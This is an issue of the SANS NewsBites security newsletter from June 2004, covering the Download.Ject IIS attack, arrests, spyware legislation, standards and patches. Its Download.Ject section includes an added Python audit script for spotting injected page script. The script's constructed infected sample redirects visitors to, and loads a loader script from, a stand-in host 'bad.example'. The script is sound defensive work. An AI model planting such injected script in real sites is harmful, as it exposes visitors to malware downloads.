SANS NewsBites is a semiweekly high-level executive summary of the most important news articles that have been published on computer security during the last week. Each news item is very briefly summarized and includes a reference on the web for detailed information, if possible.
Spend five minutes per week to keep up with the high-level perspective of all the latest security news. New issues are delivered free every Tuesday and Friday.
Volume VI - Issue #26
June 30, 2004
A new format this week, more sections to help you find useful stories quickly. Let us know whether you like it better than the old design.
Legal liability question: Has anyone contacted an attorney yet about damage done by either of these two possibly negligent actions: (1) the Witty worm, when the security software vendor may have allowed many customers to have their systems disabled because selected users may not have gotten the patch for weeks after it was ready, or (2) Download.Ject damage done to consumers - through loss of identity data and banking passwords - by infected web sites that apparently did not tell their clients that the site was infected? If you have gotten legal advice about these, please let us know by emailing info@sans.org with subject "legal liability."
Alan
TOP OF THE NEWS
DOWNLOAD.JECT ATTACK
Scob or Download.Ject Attack Prompts Browser Warning from US CERT
Download.Ject
Microsoft Says Servers Were Manually Compromised
ARRESTS, CONVICTIONS AND SENTENCES
AOL Employee Arrested for Alleged Theft of 92 Million Screen Names
HOMELAND SECURITY AND GOVERNMENT SYSTEMS SECURITY
DHS Wants Network Outage Information Kept Secret
STANDARDS AND BEST PRACTICES
IEEE Ratifies 802.11i Standard
THE REST OF THE WEEK'S NEWS
ARRESTS, CONVICTIONS AND SENTENCES
Man Used Unsecured Wireless Network in Extortion Scheme
Russian Student Convicted on Spam Charges
Bloomberg Extortionist Completes Sentence, Awaits Deportation
Four Charged with Unauthorized Access to NC State University Campus Police Computers
HOMELAND SECURITY AND GOVERNMENT SYSTEMS SECURITY
Putnam Wants to Encourage Federal Employees to Obtain Private Sector IT Certification
State CIOs Want Homeland Security Funding to Cover Cyber Security and Interoperability
LEGISLATION
House Approves Spyware Bill
Aggravated Identity Theft Convictions Could Add Years to Sentences
PHISHING
Phishing Attacks Rise Only Slightly in May
STANDARDS AND BEST PRACTICES
Microsoft Submits New eMail Sender Authentication Standard to IETF
OASIS Ratifies Application Vulnerability Description Language 1.0
Anti-Spam Technical Alliance Releases Best Practices Proposal
STATS, STUDIES AND SURVEYS
Secunia Statistics Debunk Myth of Mac OS X Security
WORMS, ACTIVE EXPLOITS, VULNERABILITIES, AND PATCHES
Lotus Notes/Domino Vulnerabilities
Fixes Available for ISC DHCP 3 Buffer Overflow Flaws
Symantec Offers Fix for DNS Cache Poisoning Vulnerability
MISCELLANEOUS
Korean Internet Users Launch Attack on Web Site in Protest Over Offensive Content
Indian BPOs Increase Security
Instructor Offers Computer Text Book in Open Source Model
THIS WEEK'S HIGHLIGHTED SECURITY TRAINING CONFERENCE
SANS largest Fall conference will be in Las Vegas this year - September 28 to October 6 - with seventeen immersion tracks taught by SANS best teachers, and special one day technology update programs and a big vendor expo. The brochures will arrive in a week or so. http://www.sans.org/ns2004
*************************************************************************
TOP OF THE NEWS
DOWNLOAD.JECT ATTACK
Scob or Download.Ject Attack Prompts Browser Warning from US CERT (28 June 2004)
A statement on the US CERT web site says that users can reduce their vulnerability to attacks by selecting browsers other than Internet Explorer; US CERT also recommends disabling JavaScript and setting security settings to high. The latest vulnerability involves code alternately called Scob and Download.Ject that attackers surreptitiously upload onto web sites running Microsoft's Internet Information Server 5.0.
-http://www.theregister.co.uk/2004/06/28/cert_ditch_explorer/print.html
Download.Ject (28/25 June 2004)
The Download.Ject attack exploits a vulnerability in Internet Information Server 5.0 and appends malicious JavaScript to each page served. Users viewing infected pages get redirected to a Russian site that downloads backdoors and keystroke loggers onto users' computers. The server that held the offending code has been taken down.
-http://www.eweek.com/print_article/0,1761,a=130269,00.asp
-http://asia.cnet.com/newstech/security/printfriendly.htm?AT=39184934-39001150t-39000005c
-http://www.securitypipeline.com/news/showArticle.jhtml;jsessionid=EIQWBHLR5YPSWQSNDBCCKHY?articleId=22102219&printableArticle=true
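As an added illustration that is not part of the cited articles: a small Python audit a site operator could run over the pages a server actually sends, to catch the pattern described above (script appended after the page's closing tag, script loaded from hosts outside the site's own, inline redirects). The sample pages and host names are constructed.

```python
"""Added example: defender-side audit for HTML responses, modelled on the
Download.Ject pattern (attacker JavaScript appended to every page served by
a compromised IIS 5.0 host).  Sample pages and hosts below are constructed."""
import re
from urllib.parse import urlparse

SCRIPT_RE = re.compile(r"<script\b([^>]*)>(.*?)</script>", re.IGNORECASE | re.DOTALL)
SRC_RE = re.compile(r"""src\s*=\s*["']?([^"'\s>]+)""", re.IGNORECASE)
# Inline constructs that hand the visitor to another location.
REDIRECT_RE = re.compile(r"window\.location|document\.location|location\.href|document\.write",
                         re.IGNORECASE)


def audit_page(html, allowed_hosts):
    """Return a list of (reason, snippet) findings for one HTML response.
    Checks: script after the last </html>; external script src whose host is
    not in allowed_hosts; inline script that redirects the visitor."""
    findings = []
    closes = [m.end() for m in re.finditer(r"</html>", html, re.IGNORECASE)]
    tail_start = closes[-1] if closes else len(html)
    for m in SCRIPT_RE.finditer(html):
        attrs, body = m.group(1), m.group(2)
        if m.start() >= tail_start:
            findings.append(("script after </html>", m.group(0)[:60]))
        src = SRC_RE.search(attrs)
        if src:
            host = urlparse(src.group(1)).hostname
            if host and host.lower() not in allowed_hosts:
                findings.append(("external script host " + host, src.group(1)))
        elif REDIRECT_RE.search(body):
            findings.append(("inline redirect", body.strip()[:60]))
    return findings


def appended_tail(served, on_disk):
    """Compare what the server sent with the file on disk.  Returns the extra
    text added after the file (empty string if none), or None when the two
    diverge earlier, which deserves a manual look."""
    if served.startswith(on_disk):
        return served[len(on_disk):]
    return None


# Constructed sample: a clean page and the same page with appended script.
CLEAN_PAGE = """<html><head><title>Store</title>
<script src="/js/menu.js"></script></head>
<body><p>Welcome</p></body></html>
"""
INFECTED_PAGE = CLEAN_PAGE + """<script>document.location="http://bad.example/x.htm";</script>
<script src="http://bad.example/loader.js"></script>
"""
SITE_HOSTS = {"www.example.com"}  # hosts the site legitimately loads script from

if __name__ == "__main__":
    for name, page in (("clean", CLEAN_PAGE), ("infected", INFECTED_PAGE)):
        print(name, audit_page(page, SITE_HOSTS))
    print(repr(appended_tail(INFECTED_PAGE, CLEAN_PAGE)))
```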
Microsoft Says Servers Were Manually Compromised (28 June 2004)
Microsoft maintains that the IIS 5.0 servers used in the attack were manually compromised rather than infected by a worm. The attack doesn't look like an automated exploit, according to a senior manager on Symantec's virus response team.
-http://www.techweb.com/wire/story/TWB20040628S0006
ARRESTS, CONVICTIONS AND SENTENCES
AOL Employee Arrested for Alleged Theft of 92 Million Screen Names (24 June 2004)
Jason Smathers, a software engineer working for America Online, has been arrested on charges he broke into the ISP's computer database and stole 92 million customer e-mail addresses which were later sold to spammers. Smathers allegedly used the identification code belonging to another AOL employee to access the data he allegedly stole; his employment duties did not give him access to the customer data. Smathers also allegedly sold the list of names to Sean Dunaway of Las Vegas, who runs an Internet gambling business. Dunaway has also been arrested; both men face maximum prison sentences of five years and $250,000 fines.
-http://www.washingtonpost.com/ac2/wp-dyn/A860-2004Jun23?language=printer
-http://www.nytimes.com/2004/06/24/technology/24spam.html?th=&pagewanted=print&position=
-http://www.msnbc.msn.com/id/5279826/
HOMELAND SECURITY AND GOVERNMENT SYSTEMS SECURITY
DHS Wants Network Outage Information Kept Secret (23 June 2004)
The US Department of Homeland Security (DHS) is encouraging regulators to keep information about network service outages out of the public eye. A Federal Communications Commission (FCC) proposal would expand a rule enacted in the early 1990s requiring telecommunications companies to disclose to the FCC information about service outages to include high-speed data lines and wireless networks. DHS is concerned that the public availability of this sort of information could serve as a "blueprint" for attackers wishing to target US critical infrastructure. The reports to the FCC would include information about causes of the outages and the "name and type of the equipment that failed." If the FCC is determined to mandate reporting, DHS would like to see the information go to the Telecommunications Information Sharing and Analysis Center (ISAC) where it would be exempt from public disclosure.
-http://www.securityfocus.com/printable/news/8966
[Editor's Note (Pescatore): So, the United States is deregulating the telecommunications infrastructure but wants to keep important service level information away from consumers? This is asinine - the best way to see improvements in telecommunications security is to have businesses and consumers be able to choose the most secure and reliable providers. Keeping that information hidden will slow down improvements, not attackers.
(Shpantzer): Do we have to do either or? Couldn't we figure out which data is so sensitive that it would be redacted from the public releases? This way the public still has information needed to make good business decisions and there is accountability in place. The redactions would then be made public when the fixes were in place, sector-wide, within a reasonable time scale. ]
STANDARDS AND BEST PRACTICES
Microsoft Submits New eMail Sender Authentication Standard to IETF (25 June 2004)
Microsoft has submitted a new email sender authentication specification draft to the Internet Engineering Task Force (IETF). The new specification, called Sender-ID, combines Microsoft's original Caller-ID for email with the Sender Policy Framework.
-http://www.informationweek.securitypipeline.com/news/22102174
-http://www.infoworld.com/article/04/06/25/HNsenderidspec_1.html
IEEE Ratifies 802.11i Standard (25/22 June 2004)
The Institute of Electrical and Electronic Engineers (IEEE) has unanimously ratified the 802.11i security standard, also known as WPA2. It is believed that the ratification will encourage organizations to adopt wireless more quickly. The new specification adds the Advanced Encryption Standard (AES) to the 802.11 protocol; most of the standard has already been built into WLAN equipment since late 2002.
-http://www.informationweek.securitypipeline.com/news/showArticle.jhtml;jsessionid=XS0FRSXL2BVOCQSNDBCSKHQ?articleId=22102078&printableArticle=true
-http://www.eweek.com/print_article/0,1761,a=130056,00.asp
-http://zdnet.com.com/2102-1103_2-5248275.html?tag=printthis
-http://www.nwfusion.com/news/2004/0625stronwlan.html
-http://www.commsdesign.com/showArticle.jhtml?articleID=22102230
THE REST OF THE WEEK'S NEWS
ARRESTS, CONVICTIONS AND SENTENCES
Man Used Unsecured Wireless Network in Extortion Scheme (25 June 2004)
Myron Tereshchuk has pleaded guilty to one count of "attempted extortion affecting commerce" for attempting to extort 17 million USD in exchange for not "broadcasting" proprietary information he had stolen from Connecticut-based MicroPatent, LLC. Tereshchuk apparently had a personal grudge against the company, and used unsecured wireless networks to send threats and extortion demands to MicroPatent. He also sent harassing email messages to the company's customers.
-http://www.securityfocus.com/printable/news/8991
[Editor's Note (Shpantzer): The FBI is lucky they had a solid lead on this, provided by none other than the suspect himself in his extortion attempts. It's much easier to surveil an individual suspect and rule him in or out versus trying to canvas a whole area of Wi-Fi access points for this type of malicious activity. ]
Russian Student Convicted on Spam Charges (24 June 2004)
A Russian teenager is the first person in his country to be convicted of sending spam. The unnamed student received a one-year suspended sentence and a 3,000 RUR (just over 100 USD) fine for sending an obscene text message to 15,000 cell phone customers.
-http://www.reuters.com/newsArticle.jhtml?type=technologyNews&storyID=5504916
Bloomberg Extortionist Completes Sentence, Awaits Deportation (24 June 2004)
Oleg Zezev, the Russian man convicted of attempting to extort money from Michael Bloomberg, founder of the Bloomberg financial news service, has completed his sentence and is now in an immigration prison awaiting deportation.
-http://www.interfax.ru/e/B/0/28.html?menu=1&id_issue=9714309
Four Charged with Unauthorized Access to NC State University Campus Police Computers (23 June 2004)
Police have charged four men for allegedly gaining unauthorized access to North Carolina State University's campus police computer system and posting phony incidents. One of the four allegedly found a password to a secure area and shared it with the others.
-http://newsobserver.com/news/nc/ncwire_news/story/1362202p-7485168c.html
HOMELAND SECURITY AND GOVERNMENT SYSTEMS SECURITY
Putnam Wants to Encourage Federal Employees to Obtain Private Sector IT Certification (22 June 2004)
Representative Adam Putnam (R-Fla.) is considering ways to encourage federal employees to acquire IT certifications. Putnam, who chairs the House Government Reform Subcommittee on Technology, Information Policy, Intergovernmental Relations and the Census, is working with administration officials and the CIO Council. A State Department pilot program is offering 10% pay increases for employees who obtain private sector IT security certification.
-http://www.gcn.com/cgi-bin/udt/im.display.printable?client.id=gcndaily2&story.id=26321
State CIOs Want Homeland Security Funding to Cover Cyber Security and Interoperability (21 June 2004)
At the fourth annual National Association of State Chief Information Officers (NASCIO) fly-in, 15 state CIOs asked legislators to allow cyber security and interoperability costs as homeland security funding expenses. Much of the funding has gone towards hazmat equipment, but states need "workable communications infrastructures" and need to protect critical infrastructure that is controlled with computer systems.
-http://www.gcn.com/cgi-bin/udt/im.display.printable?client.id=gcn2&story.id=26285
[Editor's Note (Shpantzer): Interoperability saves lives by reducing confusion at the site of a major incident, letting EMS, police and fire/hazmat coordinate a response. Please see
-http://www.publicsafetywins.gov/StateInop/States/state_map.cfm
for a report card on state of the states.
(Pescatore): Not a bad idea, but only after the states feel they have gotten sufficient funding and made sufficient progress in physical security and first responder communications interoperability. Cyber attacks against state systems are far, far down the list of realistic terrorist threats.]
LEGISLATION
House Approves Spyware Bill (25/24 June 2004)
The House Energy and Commerce Committee has approved a bill that would require purveyors of software that collects information about computer users to notify the users before it is installed on computers. The bill would also require that spyware be easy to remove and would allow the FTC to impose significant fines for certain practices, like logging keystrokes or stealing identities. A separate spyware bill has been introduced in the Senate. Technology companies have expressed concern that the bill could hinder legitimate applications.
-http://www.techweb.com/wire/story/TWB20040625S0004
-http://www.cnn.com/2004/TECH/internet/06/24/spyware.reut/index.html
-http://news.com.com/2102-1028_3-5246876.html?tag=st.util.print
Aggravated Identity Theft Convictions Could Add Years to Sentences (25/23 June 2004)
The US House of Representatives has approved the Identity Theft Penalty Enhancement Act, which tacks on as much as five years to prison sentences for people convicted of aggravated identity theft, which involves using a stolen identity in the commission of other crimes. The US Senate passed the same bill later in the week.
-http://www.eweek.com/print_article/0,1761,a=130306,00.asp
-http://www.washingtonpost.com/ac2/wp-dyn/A190-2004Jun23?language=printer
PHISHING
Phishing Attacks Rise Only Slightly in May (28/24 June 2004)
A report from the Anti-Phishing Working Group indicates that the number of phishing attacks in May (1,197) was 6% higher than the number detected in April (1,100). April's figure marked a 178% increase from March's numbers. The group also noted that because 95% of email fraud schemes use spoofed "from" addresses, an email sender authentication method is needed to stop phishing attacks.
-http://www.informationweek.com/shared/printableArticle.jhtml?articleID=22102466
-http://www.infoworld.com/article/04/06/24/HNphish_1.html
STANDARDS AND BEST PRACTICES
OASIS Ratifies Application Vulnerability Description Language 1.0 (24/23 June 2004)
The Organization for the Advancement of Structured Internet Standards (OASIS) has ratified the Application Vulnerability Description Language (AVDL) 1.0 as a standard, allowing security products to share information about application and web services vulnerabilities.
-http://searchsecurity.techtarget.com/originalContent/0,289142,sid14_gci990131,00.html
-http://www.eweek.com/print_article/0,1761,a=130141,00.asp
[Editor's Note (Pescatore): AVDL getting expanded beyond web application focus, and supported by vulnerability assessment and intrusion prevention products will be a good thing.]
Anti-Spam Technical Alliance Releases Best Practices Proposal (23/22 June 2004)
The Anti-Spam Technical Alliance (ASTA), which counts AOL, EarthLink, Microsoft and Yahoo among its members, has released a proposed set of best practices which includes recommendations for authenticating email. The group says that ISPs should not allow their servers to process third-party email without verifying that they are legitimate account holders. It wants major Internet service providers to "police" their networks and "cut off" computers they suspect are being used as spam zombies.
-http://www.washingtonpost.com/ac2/wp-dyn/A61759-2004Jun22?language=printer
-http://asia.cnet.com/newstech/security/printfriendly.htm?AT=39184357-39001150t-39000005c
-http://www.eweek.com/print_article/0,1761,a=130033,00.asp
-http://www.theregister.co.uk/2004/06/23/microsoft_bt_yahoo_spam/print.html
ASTA Technology and Policy Proposal:
-http://docs.yahoo.com/docs/pr/pdf/asta_soi.pdf
[Editor's Note (Pescatore): The important part of this effort is that the big ISPs will be trying out the different email sender authentication technologies and this should speed both final development of the standards and the adoption of those standards. Now, if we could get some similar movement towards adoption of more secure DNS authentication (like DNS SEC) fighting phishing and the like could make some real progress. ]
STATS, STUDIES AND SURVEYS
Secunia Statistics Debunk Myth of Mac OS X Security (25 June 2004)
Secunia has published statistics from a database of security advisories for 3,500 products in 2003 and 2004. Broken down by number, type and significance of the flaws, the data indicates that Mac OS X has an undeservedly rosy reputation as to security.
-http://www.computerweekly.com/articles/article.asp?liArticleID=131513&liArticleTypeID=1&liCategoryID=2&liChannelID=22&liFlavourID=1&sSearch=&nPage=1
WORMS, ACTIVE EXPLOITS, VULNERABILITIES, AND PATCHES
Lotus Notes/Domino Vulnerabilities (24 June 2004)
Two vulnerabilities have been reported in Lotus Notes/Domino; both involve input validation errors. One flaw allows cross-site scripting attacks; the other can be used to execute arbitrary code on vulnerable machines.
-http://searchsecurity.techtarget.com/originalContent/0,289142,sid14_gci990209,00.html
Fixes Available for ISC DHCP 3 Buffer Overflow Flaws (23 June 2004)
Linux vendors are releasing fixes for a pair of buffer overflow vulnerabilities in ISC's Dynamic Host Configuration Protocol (DHCP) 3 application. The flaws could allow attackers to execute code with daemon process privileges or crash vulnerable systems. According to Secunia, however, "in most cases" only users on the local network could exploit the vulnerabilities. The flaws apparently affect only two releases of DHCP 3: version 3.0.1, release candidates 12 and 13.
-http://www.techworld.com/news/index.cfm?fuseaction=displaynews&NewsID=1789
Symantec Offers Fix for DNS Cache Poisoning Vulnerability (22 June 2004)
Symantec has released an advisory and a hotfix for a DNS cache poisoning vulnerability in its Enterprise Firewall and Gateway Security software and VelociRaptor operating system. The flaw could be exploited to redirect people to malicious web sites or prevent them from visiting certain web sites altogether. There are as yet no reports of the vulnerability having been exploited.
-http://searchsecurity.techtarget.com/originalContent/0,289142,sid14_gci989627,00.html
MISCELLANEOUS
Korean Internet Users Launch Attack on Web Site in Protest Over Offensive Content (23 June 2004)
Korean Internet users have been launching attacks on a web site that has posted graphic footage of an execution of an American hostage and is looking for images of the execution of Korean Kim Sun-il.
-http://english.chosun.com/w21data/html/news/200406/200406230055.html
Indian BPOs Increase Security (22 June 2004)
Indian business process outsourcing (BPO) companies have implemented stringent screening and monitoring policies for their employees in order to reassure foreign businesses that it is safe to outsource their work to India. At Wipro Spectramind, employees are prohibited from using mobile phones and their computer access is monitored. Companies in India also share "blacklists" of employees who were fired for disciplinary problems. In addition, many businesses keep their data in domestic databases where the BPO employees can view it, but cannot "store, share, print or retain" the data on their systems.
-http://www.infoworld.com/article/04/06/22/HNindianbpo_1.html
Instructor Offers Computer Text Book in Open Source Model (21 June 2004)
Concerned that his students were spending too much money on computer training textbooks, St. Petersburg College instructor Matt Basham has compiled a two-volume manual that anyone can download free of charge. Basham is program director for Cisco Academy; he believes that information should be available to everyone regardless of financial status.
-http://www.sptimes.com/2004/06/21/news_pf/Southpinellas/SPC_tech_professor_gi.shtml
===end===
NewsBites Editorial Board:
Kathy Bradford, Roland Grefer, Stephen Northcutt, Alan Paller, John Pescatore, Marcus Ranum, Howard Schmidt, Bruce Schneier, Eugene Schultz, Gal Shpantzer, Koon Yaw Tan
Please feel free to share this with interested parties via email, but no posting is allowed on web sites. For a free subscription, (and for free posters) or to update a current subscription, visit http://portal.sans.org/